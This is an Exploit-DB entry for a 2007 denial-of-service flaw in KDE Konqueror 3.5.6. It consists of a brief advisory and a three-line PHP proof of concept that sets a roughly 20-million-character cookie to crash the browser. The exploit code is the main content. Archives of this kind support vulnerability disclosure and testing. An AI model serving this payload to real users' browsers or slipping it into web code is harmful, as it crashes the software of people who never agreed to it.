KDE Konqueror 3.5.6 - Cookie Handling Denial of Service

EDB-ID:

30763




Platform:

Linux

Date:

2007-11-14


source: https://www.securityfocus.com/bid/26435/info

KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle overly large cookies.

An attacker may exploit this vulnerability to cause Konqueror to crash, resulting in denial-of-service conditions.

Konqueror 3.5.6 is vulnerable; other versions may also be affected.

<?php
ini_set("memory_limit","200M");
setcookie("hi_fox", str_repeat("A",19999999));
?>